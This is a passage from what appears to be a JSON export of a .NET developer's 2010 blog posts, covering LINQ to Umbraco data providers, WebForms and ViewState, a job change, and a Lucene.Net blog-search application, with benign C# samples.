Woo!"; var smtp = new SmtpClient(); smtp.Send(mail); var emailSettings = (MailSettingsSectionGroup)ConfigurationManager .OpenExeConfiguration(ConfigurationUserLevel.None) .GetSectionGroup("system.net/mailSettings"); var folder = emailSettings.Smtp.SpecifiedPickupDirectory.PickupDirectoryLocation; var eml = new EmlHelper(new DirectoryInfo(folder).GetFiles().First().FullName); //Assert Assert.AreEqual(mail.To[0].Address, eml.To); Assert.AreEqual(mail.Subject, eml.Subject); //and so on } So there you have it, a very simple way to make email sending testable.\n", "id": "2010-08-28-testable-email-sending" }, { "title": "Creating a RssDataProvider for LINQ to Umbraco", "url": "https://www.aaron-powell.com/posts/2010-08-27-rssdataprovider-for-linq-to-umbraco/", "date": "Fri, 27 Aug 2010 00:00:00 +0000", "tags": [ "umbraco", "linq-to-umbraco", "umbracodataprovider" ], "description": "Creating custom DataProviders for LINQ to Umbraco", "content": "Sorry to all the people who were kind enough to come to my LINQ to Umbraco session at CodeGarden 09, I said I would do this post soon after the session. Sadly I started enjoying Copenhagen too much without the need to be sitting at my laptop, and now it’s a week later, I’m home and it’s time I come good on my promise.\n##The LINQ to Umbraco DataProvider model\nSomething that I have implemented with LINQ to Umbraco, and something which will be taking a stronger focus in Umbraco going forward, is a Provider model for the Umbraco data. What does this mean for LINQ to Umbraco? Well the classes generated for LINQ to Umbraco act as proxies to a data model, they don’t expect the data to come from anywhere in particular.\nThis has a really neat advantage: you can write your own DataProvider which exposes the data from wherever you want. LINQ to Umbraco will ship as part of 4.1 with a single DataProvider, the NodeDataProvider. This enables the use of LINQ to Umbraco against the XML cache, which was the initial design of it.\n##Anatomy of a DataProvider\nThe DataProvider itself is an abstract class which has a number of methods which are implemented to do different operations; the primary method you need to be implementing is the LoadTree method, which is responsible for the initial population of the collection from your data source.\nThere are other methods which have different uses, I won’t be covering them in this post, but they will be going up on the new Umbraco wiki (where the LINQ to Umbraco section is starting to come together).\nThe LoadTree<TDocType> method needs to then return an instance of a Tree<TDocType>, which is another abstract class that needs to be implemented to handle the data mapping for your data provider.\n##Creating an RssDataProvider\nWhile we were hacking at the Umbraco Retreat prior to CodeGarden 09 I decided to try a proof-of-concept about how you could use the generated classes in a proxy manner. I may have written LINQ to Umbraco for this purpose, but it wasn’t something that I had actually tried to do. So I decided to create a basic little DataProvider which would read an RSS feed and turn the returned data into LINQ to Umbraco objects which could then be used in the Umbraco content tree.\nThe first step is to generate the LINQ to Umbraco classes; with Umbraco 4.1 you will be able to do this directly from the Settings -> Document Types node.
I created a basic little Document Type named RSS Item and then generated the class for it.\nNext came the task of implementing my custom UmbracoDataProvider, I created my class:\npublic class RssDataProvider : UmbracoDataProvider { } And then set about implementing a constructor which takes the RSS feed URL (in this demo I used the Yahoo! Pipes which are on the homepage of our.umbraco) and then implemented the LoadTree method:\npublic override Tree LoadTree() { //supporting loading a full Tree //throw an exception if the type of the tree is an unsupported one if (typeof(TDocType) != typeof(RssItem)) { throw new NotSupportedException(typeof(TDocType).Name); }\n//create a request to the URL supplied WebRequest request = WebRequest.Create(this._feedUrl); //do a GET and string buffer the response HttpWebResponse response = (HttpWebResponse)request.GetResponse(); Stream dataStream = response.GetResponseStream(); StreamReader reader = new StreamReader(dataStream); string responseFromServer = reader.ReadToEnd(); //make a LINQ to XML representation of the RSS XDocument xdoc = XDocument.Parse(responseFromServer); //select the posts var items = xdoc.Descendants("item"); //make an RssTree from the items returned by the feed return new RssTree(items, this); } So now I have a load method which reads my RSS feed (and I’ve restricted it to only support my RssItem Document Type), now it’s time to create the RssTree from the provided data.\n##Tree<TDocType>\nThis class is really just a wrapper for the IEnumerable class. The way in which I have implemented the RssTree (and how I implemented the NodeTree) is by using delayed loading. What I mean is that the data isn’t converted from the source to the result until the GetEnumerator() method is called. This means that unless I do something with the collection there is no performance hit.\nThe following code is a bit of a hack (for the return type anyway) but that is because I wanted to show it being done without the use of reflection. If you want to see how to achieve it with a complete generic type check out the source for the NodeTree which is on Codeplex.\nAnyway here’s how the GetEnumerator() method looks:\npublic override IEnumerator GetEnumerator() { //this is a bit hacky as i only support 1 doc type //normally the load can be done via reflection (which is how the NodeTree works) foreach (var item in _items) { var rssItem = new TDocType() as RssItem; rssItem.Name = (string)item.Element("title"); rssItem.Link = (string)item.Element("link"); rssItem.Description = (string)item.Element("description"); rssItem.PublishDate = (DateTime)item.Element("pubDate"); rssItem.Content = (string)item.Element("content"); rssItem.CreateDate = (DateTime)item.Element("pubDate"); //Because RssItem may not be the type of TDocType (although in this example we'll assume it always is) //we have to downcast to DocTypeBase before casting to the generic. yield return (TDocType)(DocTypeBase)rssItem; } } So what’s going on, well first off we’re itterating through the collection of XML items returned from the initial load (_items) and then creating a new instance of the RssItem class and assigning the properties from the XML. You can see the comment mentioning the hack, having to do some crazy casting, that is because I’m not really doing the Generics properly.\nI’ve also implemented it via yield return, not building the entire collection into say a List and then returning its Enumerator. 
The reason for this is you’ll pick up a bit of performance if you are doing methods like Take(int) or breaking from a loop early. You should probably push the items into an internal collection to support caching (which is what the Node implementation does), but this is just a quick demo.\nAny that is as simple as it gets to write your own custom DataProvider for LINQ to Umbraco! Sure I’ve skipped a few sections (such as how to do child associations, but in this demo it’s not really viable) but hopefully this should give you a heads up on how to do it. And how does it work? Well just like this:\nusing (var ctx = new RssDataContext(new RssDataProvider("http://pipes.yahoo.com/pipes/pipe.run?_id=8llM7pvk3RGFfPy4pgt1Yg&_render=rss"))) { var feedItems = ctx.RssItems.Take(8); Assert.IsNotNull(feedItems); Assert.IsTrue(feedItems.GetEnumerator() != null); } That’s right, the above code is from a unit test, remember LINQ to Umbraco is capable of running outside of a web context so it is very easy to unit test!\n##Making this into an Umbraco Content Tree\nNow here is where the fun part comes in, you can easily turn the above data provider into a custom Umbraco tree. This means you can either make it into your own custom Umbraco module (/ application, what ever you call it!), or append it to the standard Content Tree! Isn’t THAT a funky idea hey!\nI’m not going to get too in-depth into this, Shannon Deminik has done some good documentation about that (again, see the wiki). So rather than going over the code I’m going to show it off in a short screencast and you can look into the provided source package with this post.\nThe screenscast is available here and the source code is here.\n", "id": "2010-08-27-rssdataprovider-for-linq-to-umbraco" }, { "title": "Creating custom DataProviders for LINQ to Umbraco", "url": "https://www.aaron-powell.com/posts/2010-08-27-creating-custom-dataprovider-for-linq-to-umbraco/", "date": "Fri, 27 Aug 2010 00:00:00 +0000", "tags": [ "umbraco", "linq-to-umbraco", "umbracodataprovider" ], "description": "Creating custom DataProviders for LINQ to Umbraco", "content": "Sorry to all the people who were kind enough to come to my LINQ to Umbraco session at CodeGarden 09, I said I would do this post soon after the session. Sadly I started enjoying Copenhagen too much without the need to be sitting at my laptop and now it’s a week later, I’m home and it’s time I come good on my promise.\n##The LINQ to Umbraco DataProvider model\nSomething that I have implemented with LINQ to Umbraco, and something which will be taking a stronger focus in Umbraco going forward, is a Provider model for the Umbraco data. What this means with LINQ to Umbraco? Well the classes generated for LINQ to Umbraco act as proxies to a data model, they don’t expect the data to come from anyway in particular.\nThis has a really neat advantage of the fact that you can write your own DataProvider which exposes the data from how ever you want. LINQ to Umbraco will ship as part of 4.1 with a single DataProvider, the NodeDataProvider. 
This enables the use of LINQ to Umbraco against the XML cache, which was the inital design of it.\n##Anatomy from a DataProvider\nThe DataProvider itself is an abstract class which has a number of methods which are implemented do different operations, the primary method you need to be implementing is the LoadTree method, this is responsible for the initial population of the collection from your data source.\nThere are other methods which have different uses, I wont be covering them in this post, but they will be going up on the new Umbraco wiki (which the LINQ to Umbraco section is starting to come up).\nThe LoadTree<TDocType> method needs to then return an instance of a Tree<TDocType>, which is another abstract class that needs to be implemented to handle the data mapping for your data provider.\n##Creating an RssDataProvider\nWhile we were hacking at the Umbraco Retreat prior to CodeGarden 09 I decided to try a proof-of-concept about how you could use the generated classes in a proxy manner. I may have written LINQ to Umbraco for this purpose, but it wasn’t something that I had actually tried to do. So I decided to create a basic little DataProvider which would read an RSS feed and turn the returned data from there into LINQ to Umbraco objects which could then be used in the Umbraco content tree.\nThe first step is you need to generate the LINQ to Umbraco classes, with Umbraco 4.1 you will be able to do this directly from the Settings -> Document Types node. I created a basic little Document Type named RSS Item and then generated the class for it.\nNext came the task of implementing my custom UmbracoDataProvider, I created my class:\npublic class RssDataProvider : UmbracoDataProvider { } And then set about implementing a constructor which takes the RSS feed URL (in this demo I used the Yahoo! Pipes which are on the homepage of our.umbraco) and then implemented the LoadTree method:\npublic override Tree LoadTree() { //supporting loading a full Tree //throw an exception if the type of the tree is an unsupported one if (typeof(TDocType) != typeof(RssItem)) { throw new NotSupportedException(typeof(TDocType).Name); }\n//create a request to the URL supplied WebRequest request = WebRequest.Create(this._feedUrl); //do a GET and string buffer the response HttpWebResponse response = (HttpWebResponse)request.GetResponse(); Stream dataStream = response.GetResponseStream(); StreamReader reader = new StreamReader(dataStream); string responseFromServer = reader.ReadToEnd(); //make a LINQ to XML representation of the RSS XDocument xdoc = XDocument.Parse(responseFromServer); //select the posts var items = xdoc.Descendants("item"); //make an RssTree from the items returned by the feed return new RssTree(items, this); } So now I have a load method which reads my RSS feed (and I’ve restricted it to only support my RssItem Document Type), now it’s time to create the RssTree from the provided data.\n##Tree<TDocType>\nThis class is really just a wrapper for the IEnumerable class. The way in which I have implemented the RssTree (and how I implemented the NodeTree) is by using delayed loading. What I mean is that the data isn’t converted from the source to the result until the GetEnumerator() method is called. This means that unless I do something with the collection there is no performance hit.\nThe following code is a bit of a hack (for the return type anyway) but that is because I wanted to show it being done without the use of reflection. 
If you want to see how to achieve it with a complete generic type check out the source for the NodeTree which is on Codeplex.\nAnyway here’s how the GetEnumerator() method looks:\npublic override IEnumerator GetEnumerator() { //this is a bit hacky as i only support 1 doc type //normally the load can be done via reflection (which is how the NodeTree works) foreach (var item in _items) { var rssItem = new TDocType() as RssItem; rssItem.Name = (string)item.Element("title"); rssItem.Link = (string)item.Element("link"); rssItem.Description = (string)item.Element("description"); rssItem.PublishDate = (DateTime)item.Element("pubDate"); rssItem.Content = (string)item.Element("content"); rssItem.CreateDate = (DateTime)item.Element("pubDate"); //Because RssItem may not be the type of TDocType (although in this example we'll assume it always is) //we have to downcast to DocTypeBase before casting to the generic. yield return (TDocType)(DocTypeBase)rssItem; } } So what’s going on, well first off we’re itterating through the collection of XML items returned from the initial load (_items) and then creating a new instance of the RssItem class and assigning the properties from the XML. You can see the comment mentioning the hack, having to do some crazy casting, that is because I’m not really doing the Generics properly.\nI’ve also implemented it via yield return, not building the entire collection into say a List and then returning its Enumerator. The reason for this is you’ll pick up a bit of performance if you are doing methods like Take(int) or breaking from a loop early. You should probably push the items into an internal collection to support caching (which is what the Node implementation does), but this is just a quick demo.\nAny that is as simple as it gets to write your own custom DataProvider for LINQ to Umbraco! Sure I’ve skipped a few sections (such as how to do child associations, but in this demo it’s not really viable) but hopefully this should give you a heads up on how to do it. And how does it work? Well just like this:\nusing (var ctx = new RssDataContext(new RssDataProvider("http://pipes.yahoo.com/pipes/pipe.run?_id=8llM7pvk3RGFfPy4pgt1Yg&_render=rss"))) { var feedItems = ctx.RssItems.Take(8); Assert.IsNotNull(feedItems); Assert.IsTrue(feedItems.GetEnumerator() != null); } That’s right, the above code is from a unit test, remember LINQ to Umbraco is capable of running outside of a web context so it is very easy to unit test!\n##Making this into an Umbraco Content Tree\nNow here is where the fun part comes in, you can easily turn the above data provider into a custom Umbraco tree. This means you can either make it into your own custom Umbraco module (/ application, what ever you call it!), or append it to the standard Content Tree! Isn’t THAT a funky idea hey!\nI’m not going to get too in-depth into this, Shannon Deminik has done some good documentation about that (again, see the wiki). 
So rather than going over the code I’m going to show it off in a short screencast and you can look into the provided source package with this post.\nThe screenscast is available here and the source code is here.\n", "id": "2010-08-27-creating-custom-dataprovider-for-linq-to-umbraco" }, { "title": "Understanding LINQ to Umbraco", "url": "https://www.aaron-powell.com/posts/2010-08-27-understanding-linq-to-umbraco/", "date": "Fri, 27 Aug 2010 00:00:00 +0000", "tags": [ "umbraco", "linq-to-umbraco" ], "description": "A look what LINQ to Umbraco is and what it isn't", "content": "When LINQ to Umbraco dropped with Umbraco 4.5.0 there was a lot of excitement around it and everyone started using it. Personally I was thrilled about this, LINQ to Umbraco was the culmination of 6 months of really solid development effort and I was glad to see that it was paying off.\nBut like all new technologies there can be miss-conceptions about what it is and what it isn’t and hopefully I’ll shed a bit of light on what the goal of LINQ to Umbraco is, what it is and what it isn’t.\n##Project Goals\nWhen I set about writing LINQ to Umbraco it was because I was frustrated at the lack of type safety coming from the NodeFactory API. This combined with the proliferation of magic strings to represent the properties made me think that there had to be a better way to go about it. Initial I achieved this with a project I dubbed the Umbraco Interaction Layer which was basically a wrapper for the Document API as I was doing a lot of creating and editing of nodes at the time using the API and I wanted it strongly typed.\nOnce I did the initial version of that I realised that people were wanting to do reads with it too, but this was not what the UIL was designed for, in fact reading was a REALLY bad idea with it as it relied on the Document API and did a hell of a lot of database calls.\nSo I set about doing a new version, a real version of LINQ to Umbraco, and something that looked a lot like LINQ to SQL.\nWhile doing the initial design for LINQ to Umbraco I decided on a few core ideas:\nNo reliance on any underlying API Extensibility Testability Close resemblance LINQ to SQL (which I was heavily working with at the time, and this was before it was killed :P) And for the most part LINQ to Umbraco that we see today does match with what I set out to achieve.\n##Removing the reliance on underlying API’s\nThis was really a core goal of mine with LINQ to Umbraco, I didn’t want to be tied to the Umbraco XML, nor did I want to be tied to the Document API, I’d made that mistake before and it cost me with the extensibility of the UIL, so I wanted to work out a way around this.\nWhile doing research into how LINQ to SQL works I came across something interesting, LINQ to SQL does kind of have the ability to swap out the data source. Seriously, if you check out the DataContext class in Reflector you’ll see that there’s a private field called provider which is the way it connects to the database. So LINQ to SQL could have been a more extensible framework (well, you can make it so via reflection) why not follow the same idea and make LINQ to Umbraco provider based?\nAnd that’s essentially what I did, in the form of the UmbracoDataProvider class. Since I figured that 99% of the time people are going to want to work with LINQ to Umbraco and not have to think about it I decided that I should create a default one that would work with the XML, as that’s what most people would be doing with it, replacing NodeFactory. 
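In usage terms that provider model is just a constructor argument; a rough sketch (the context type comes from code generation, and the feed URL here is purely illustrative):

// Default: no provider supplied, so the XML-cache provider is used.
using (var ctx = new UmbracoDataContext())
{
    // query the generated types as usual...
}

// Swapping in a custom provider, along the lines of the RssDataProvider shown earlier.
using (var ctx = new UmbracoDataContext(new RssDataProvider("http://example.org/feed")))
{
    // the same LINQ queries now run over a completely different data source
}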
This goal was achieved by creating the NodeDataProvider, which the default constructor for the UmbracoDataContext will use. Note that it’s called the **Node**DataProvider, implying that it works with the idea of Node in Umbraco, which is read-only (we’ll come to this shortly).\nSo ultimately what we’ve ended up with is a read-only way of accessing data in a strongly typed fashion in Umbraco.\n##Extensibility and LINQ to SQL\nAs I mentioned about LINQ to SQL had the initial design to be extensible (but since it’s being killed off at the moment in favor of Entity Framework I can understand the lacking desire to maintain to provider-based ORM’s :P) I wanted to have something similar with LINQ to Umbraco. By having the UmbracoDataProvider a class which you pass into the UmbracoDataContext you could easily swap this out for something else that you’ve written (at CodeGarden 09 I did a PoC of this with a very early version of LINQ to Umbraco and reading an RSS feed, this code will not work with 4.5 but is designed to get your brain working).\nAnd because I was going for LINQ to SQL as the original model for what I wanted I decided that I should try and maintain as much of the LINQ to SQL features as I wanted, one of the features that I ported is the SubmitChanges method.\n##CRUD with LINQ to Umbraco\nThis has caused a bit of confusion and it’s a lot to do with me not having written this section of my blog post already.\nOn the question of “Does LINQ to Umbraco support CRUD?” the short answer is Yes, with the long answer being “Yes, but only if your UmbracoDataProvider supports it”.\nIf you try doing SubmitChanges in LINQ to Umbraco with the NodeDataProvider you’ll wind up with a System.NotSupportedException being thrown. The reason for this is, as I mentioned earlier, the NodeDataProvider is read-only. Remember it maps to the concept of Node in Umbraco.\nAt the moment there is no released UmbracoDataProvider that I’m aware of which supports writing to the Umbraco database (or any database for that matter) but it is something that I hope to one day write about, it’s on my ever-increasing TODO list :P.\nSo basically out of the box LINQ to Umbraco will throw errors (and hopefully relevant errors) indicating that you’re not allowed to do CRUD.\n##Testability\nAnother equally high priority feature of LINQ to Umbraco that I wanted was the ability to test it. Umbraco is notoriously hard to test, I’ve written about it in the past, so I didn’t want to introduce anything with LINQ to Umbroco which would make it harder to do testing, in fact I wanted to introduce something that would make it easier to test.\nTo this end everything that you (should) need to be able to override in a unit testing scenario can be overridden in a unit testing scenario.\nI wont go into how to do that here, it’s something that deserves an entire set of articles but if you’re interested in unit testing with Umbraco I recommend you check out the article linked above.\n##Right tool for the right job\nLINQ to Umbraco was never designed to be a full replacement for everything Umbraco does, in fact it’s really designed as an alternative to XSLT’s.\nYou wouldn’t (well at least you shouldn’t) use XSLT to output a property from the current node in a page, and additionally you shouldn’t use LINQ to Umbraco for that. That is the role of <umbraco:Item /> and don’t take that away from it!\nSomething that people are starting to notice with LINQ to Umbraco is there is no built-in way to get the current page as a LINQ to Umbraco object. 
The reason for this is that LINQ to Umbraco is flat, it doesn’t really understand hierarchies, because hierarchies is something that is really a concept of the published Umbraco data (and to a lesser extent the database).\nWith LINQ to Umbraco you can easily access data from anywhere in the site, the UmbracoDataContext gives you list of all your types and you can grab all your data there, it’s not until you have an object can you start understanding hierarchies. From a single object you can go down and up it’s object graph, because now you have a contextual point to work with.\nSo when you’re thinking “Is LINQ to Umbraco right for me?” think about what you’re trying to achieve, if you want to work with just the current node then it’s probably not the right tool for you, in fact you’re probably even better off with just the standard Umbraco displaying of a node.\n##To dispose or not to dispose?\nSomething that you may notice with LINQ to Umbraco is that the UmbracoDataContext and the UmbracoDataProvider are both disposable objects, this was also ported from the LINQ to Umbraco idea, but generally it’s a bit less-than-desirable to achieve full disposal constantly.\nThe NodeDataProvider itself has quite a bit of caching built into it. Every time you request an object it will be looked up in its internal cache before it’s created, just in case it has previously been found. So deciding if you should be disposing of your object at the end of the unit of work really depends on how big your site is. A lot of the implementations which I’ve worked on we’ve actually chosen to run a singleton instance of the objects, and the reason for this is that we’ve got large sites.\nThere is nothing wrong with running a singleton for the UmbracoDataContext and UmbracoDataProvider objects, just keep in mind that you may get stale data. On the NodeDataProvider there is a Flush method, this will essentially force the cache to be cleared within it so that next time you’ll get new objects from the XML. The reason that the Flush method doesn’t reside on the UmbracoDataProvider is because it should be up to the implementor of the UmbracoDataProvider to decide if/ how they are caching objects.\n##IQueryable\nLINQ to Umbraco doesn’t implement IQueryable, instead it implements IEnumerable. If you’re interested in understanding why IEnumeraable was used rather than IQueryable I have covered that in its own article.\n##Conclusion\nHopefully this article has given you a bit of an insight into how LINQ to Umbraco was designed, what it was designed for and how you should be use it.\nEveryone who’s using it keep your feedback coming so that we can look to expand and evolve LINQ to Umbraco in Umbraco 4.5 and Umbraco 5.\n", "id": "2010-08-27-understanding-linq-to-umbraco" }, { "title": "All good things come to an end", "url": "https://www.aaron-powell.com/posts/2010-08-08-all-good-things-come-to-an-end/", "date": "Sun, 08 Aug 2010 00:00:00 +0000", "tags": [ "umbraco", "random-stuff" ], "description": "", "content": "As you have probably seen we at TheFarm require a senior .NET developer, and there is a some-what sad reason for this… I’ve decided to move on from TheFarm.\nI’ve taken a job with one of Australia’s top .NET consulting agencies, Readify. 
I’m really excited about having the opportunity to work with some of Australia’s best .NET developers, and I’m really quite excited about this chance.\nI do feel sad about leaving TheFarm though, I’ve had an awesome 12 months working with Shannon, I’ve learnt a shit load and made a great set of friends. And if you’re looking for a new job (or you’re thinking of moving to Australia) I’d recommend talking to the guys at TheFarm.\nWhat about Umbraco? When I took the job with TheFarm last year one of the main drives was to have the chance to work closer with Shannon on Umbraco (and producing the AUSPAC Mafia!) and moving on does not mean that I’m becoming less involved with Umbraco.\nIn fact, it’s the opposite really. Something that I’ve found being a core team member and an Umbraco user was that I often had to make a choice between the two. Anyone looking at codeplex will have seen my check-in’s drop off, and that was a lot to do with working every day with Umbraco, I was finding it hard to then come how and work on the core product as well. My new role is less Umbraco focused which is going to free up my desire to work on Umbraco more.\nAnd with v5 kicking along I’m really excited to get back into hard-core Umbraco core development.\nHere’s to the next chapter!\n", "id": "2010-08-08-all-good-things-come-to-an-end" }, { "title": "Yes, I LIKE WebForms!", "url": "https://www.aaron-powell.com/posts/2010-08-07-yes-i-like-webforms/", "date": "Sat, 07 Aug 2010 00:00:00 +0000", "tags": [ "webforms-mvp", "webforms", "web", "asp.net" ], "description": "I think ASP.Net WebForms is really quite good, and here's some thoughts on the topic", "content": "At some of my speaking engagements recently I’ve made the astonishing claim that I quite like ASP.Net WebForms. Why do I say this is an astonishing claim? Quite often when I’m talking to other ASP.Net developers and we end up on the topic of WebForms you can see a look of distaste in their eyes, or there’ll be a statement like “I’m stuck working with WebForms”.\nBut when you ask someone why they don’t like WebForms they generally don’t have a really good reason, they come up with a few points like:\nViewState is bloated Controls are heavy It’s not testable So I thought I’d share a few of my thoughts on the topic because well, everyone wants to hear my opinion :P.\nViewState ViewState is a double-edged sward and if you’re not familiar with it and what it’s goals are then you’re probably going to end up doing it wrong.\nFirst thing everyone should do when starting ASP.Net development is read this article by David Reed. The article may be 4 years old but everything still holds true today.\nAnd once you understand ViewState you can understand how to use it to your advantage. Keep in mind that ViewState can be turned on or off for any particular control (with .NET 4.0 the control is even better), and you really should be setting it properly.\nTo enable or to disable? When you turn ViewState on you’re adding weight to the response back to the client (well unless you use a different provider), and this is something that you need to be aware of. Take a look at the controls you’re using, what’s the data they have in them and what’s the cost of that data?\nSay you have a literal, or a label and you’re setting some text on it from a resource file. 
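As a minimal sketch of that scenario (the control and resource names here are made up), the code-behind just re-assigns the text on every request and switches ViewState off for the control:

protected void Page_Load(object sender, EventArgs e)
{
    // The label gets its text from a resource on every request anyway,
    // so there is nothing for ViewState to usefully remember.
    WelcomeLabel.EnableViewState = false; // or EnableViewState="false" in the markup
    WelcomeLabel.Text = Resources.SiteText.WelcomeMessage;
}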
It’s not that expensive to do the text setting, so why have the framework do it for you at the cost to the end user?\nThis principle can be applied to any kind of control, and once you start looking at what you’re putting into your page you’ll realise just how often you don’t need to have ViewState enabled.\nA little bit of planning and you’ll not have to look at the giant ViewState slab.\nControls Controls are great, they package up some functionality and make it easy to redistribute. But people often say that this is one of the big downsides of WebForms and MVC gives you much better flexibility. But think about some of the trivial (read: boring) tasks which we have to do as developers:\nCreate a login form Output a collection of data using a template So with MVC this is something that you end up having to write yourself, sure there are some helpers like Html.EditorFor and stuff so you can quickly display something. And it’s true there’s plenty of good extensions to do things like Repeaters, so this is just taking WebForms concept into MVC right?\nOne of the other main criticisms of controls is that they generate HTML for you that is hard to style, and often unchangable. But think about what they are trying to generate, a standard design cross-browser. Try having a floating layout which can be dropped anywhere and look the same?\nTrue it makes them less flexible, but it depends what you’re trying to achieve.\nTestability I’ve done plenty of articles in the past about testibility so I’m not going to dwell too much. All I’m going to say is that you need WebForms MVP, it’s fantastic!\nConclusion I think that WebForms is a great framework and one that we’ll have with us for a long time still. If you understand what you’re working with, that it’s not MVC and there is a lot of power which it has to give you’ll learn that it isn’t really that bad :).\n", "id": "2010-08-07-yes-i-like-webforms" }, { "title": "Building an application with Lucene.Net", "url": "https://www.aaron-powell.com/posts/2010-07-10-building-an-application-with-lucene-net/", "date": "Sat, 10 Jul 2010 00:00:00 +0000", "tags": [ "lucene", "lucene.net", "c#" ], "description": "A more in-depth look at how to use Lucene for storage and building a simple application", "content": "For this article we’re going to go through building a small application with uses Lucene.Net as a storage model. I read a lot of blogs so I’m often find that when I’m working I want to refer back to a blog that I read in the past. The problem is that finding that particular blog can be tricky, navigating through a few thousand posts can be fairly tedious. So let’s build an application which we can quickly search and find the posts that I’m interested in.\n##Designing for Lucene\nAlthough Lucene is a Document Database it’s also a search engine. This means that Lucene can actually be used as a mid-point in the application you’re designing. This can be used to turn our data for the UI without having to go to your underlying data store. This can provide speed boosts (and generally does) if you’re using Lucene well.\n##To Store or not to Store…\nSo I’m wanting a way which I can quickly find blogs which are matching particular search terms, but I want it to be fast and I want it to be small. The blog posts are available on the web, so I can access them if/ when I need, but do I really need to have my application showing all the data too? I don’t think so, it would mean that my application needs to act a bit like a web browser, and this seems to be a bit silly. 
It also adds a dependency which I don’t really want in my application.\nWell this means that I don’t really need to store much data at all, I just need to store the indexes! Now all I need to work out is what I want to show on my UI.\nI’ve decided that I want only a very basic little UI, I just want to have a link to the article and the name of it. This means that I can save some space by not storing the content of the blog post in my index, after all, if you want to read the content you’re going out to the web.\nThis kind of split approach with Lucene is a common way to use Lucene. When working with Lucene the most performance intensive part of the process is actually getting the data back out of the index. Searching against Lucene is really fast, it’s what Lucene is designed for. So we have Lucene to mainly just store our analyzed version of our data, and then we have our underlying data store to retrieve all of the data.\n##Building the BlogManager\nI’m going to be making this little application using WPF (yep, the web developer is trying WPF, and it’s going… ok :P). First off I want a way to add RSS feeds to be able to search against:\nSo there we go, we’re able to provide the URL for a blog and we’re going to push some data into our index. I’m actually using Lucene to store the URL’s as well as the actual blogs to search against. Remember that a Document Database doesn’t have a schema, so you can stick anything in there that you want. Let’s see some code:\npublic MainWindow() { InitializeComponent(); var path = new DirectoryInfo(Path.Combine(new FileInfo(Assembly.GetExecutingAssembly().Location).Directory.FullName, "LuceneIndex")); if (!path.Exists) { path.Create(); path.Refresh(); } this.directory = new SimpleFSDirectory(path); this.analyzer = new StandardAnalyzer(Lucene.Net.Util.Version.LUCENE_29); this.writer = new IndexWriter(directory, analyzer, IndexWriter.MaxFieldLength.UNLIMITED); this.searcher = new IndexSearcher(directory, true); } This is just my setup method, and I’m setting up a few default objects which I want to persist within my application. I’m using the StandardAnalyzer (here’s more info on analyzers) and the SimpleFSDirectory as my storage model. It’s all just setup, not very interesting code, but it can’t hurt to show you this stuff :P.\nTo get the data from the feed I’m using the SyndicationFeed from the .NET framework, but you could parse the XML yourself, or use any other library if you really wanted, but this done a good enough job for what I need. You just use it like this:\nXmlReader xmlReader = XmlReader.Create(url); var feed = SyndicationFeed.Load(xmlReader); Now lets put our data into the index:\nvar doc = new Document(); doc.Add(new Field("name", feed.Title.Text, Field.Store.YES, Field.Index.NO)); doc.Add(new Field("url", url, Field.Store.YES, Field.Index.NO)); doc.Add(new Field("type", "BlogUrl", Field.Store.NO, Field.Index.ANALYZED)); writer.AddDocument(doc); For this I’m storing the title of the feed and the URL of it, this is because I’m wanting to show them in a data grid (so I can get an overview of what feeds I’m indexing). And since I don’t want to be searching this data I’m leaving it unindexed. But so I can easily find this data I’m adding a meta-data property, in the form of the type field. This is something that is just meta data, so I don’t want to display it, but I do need to be able to search on it. That’s why I’m leaving it unstored and analyzed. 
Lastly I add this to my IndexWriter instance and we’re nearly done.\nNext we need to push in the blogs which we’ve found from here:\nforeach (var item in feed.Items) { doc = new Document(); doc.Add(new Field("title", item.Title.Text, Field.Store.YES, Field.Index.ANALYZED)); doc.Add(new Field("content", StripHtml(item.Summary.Text), Field.Store.NO, Field.Index.ANALYZED)); doc.Add(new Field("categories", string.Join(" ", item.Categories.Select(x => x.Name)), Field.Store.NO, Field.Index.ANALYZED)); doc.Add(new Field("url", item.Links.First().Uri.ToString(), Field.Store.YES, Field.Index.NO)); doc.Add(new Field("type", "BlogPost", Field.Store.NO, Field.Index.ANALYZED)); writer.AddDocument(doc); } Here is pretty much the same as what we had previously, we’re just grabbing some properties and then putting them into the Document which is then written to the index. I’m setting a no-store on the content of the post and it’s categories since these are just things that I’m going to be searching against, but not ever showing it on the UI.\nNow we just do a commit to our index:\nwriter.Commit(); Our blog has been added into our index, woo! Now it’ll be listed below in the data grid:\n##Searching the blogs\nNow that we’ve got some stuff in our index let’s try and get at it. I’ve got another awesome example of UI design for that:\nHere I’ve got a big text box which I can enter a Lucene query using the Lucene Query Parser Syntax so I can just get at the data. Lets say that I want all the posts which had Umbraco in the title:\nOr maybe I’ll get all the ones which contain Umbraco or Lucene.Net:\nAnd here’s the underlying code:\nvar queryParser = new MultiFieldQueryParser(Version.LUCENE_29, new[] { "title", "content", "categories", "type" }, analyzer); var query = new BooleanQuery(); query.Add(queryParser.Parse(this.QueryText.Text), BooleanClause.Occur.MUST); query.Add(queryParser.GetFieldQuery("type", "blogpost"), BooleanClause.Occur.MUST); var results = searcher.Search(query, null, searcher.MaxDoc()); It’s quite simple actually, I’m creating a [MultiFieldQueryParser][11] since the user may be searching across multiple different fields in the index. I’m specifying the fields which I defined earlier then taking the text which the user entered and parsing that into a Query object. I’m also doing a addition of the type field, so the actual query that you’ll end up with actually looks like this:\n+(title:umbraco) +type:blogpost I’m actually wrapping any query the user puts in so that I can postfix the type query but not override anything that they are supplying (ie - any OR conditionals will be cancelled out if the AND for the type is used).\nI’m not supporting paging in the datagrid so I’m just getting back all the results. This is not recommended as it will put a lot more strain on the Lucene index than is really needed. You should only request the number of documents you actually require.\nAnd all that’s left is to hydrate the entities:\nresults.scoreDocs.Select(x => { var doc = searcher.Doc(x.doc); return new { Title = doc.Get("title"), Url = doc.Get("url"), Score = x.score }; }); Then you can push that onto your UI to get the lovely results we saw earlier.\n##Conclusion\nThis is a very quick look at how you can use Lucene.Net to make an application that actually works across multiple data stores. Here I’m using a Lucene index for nothing but searching. 
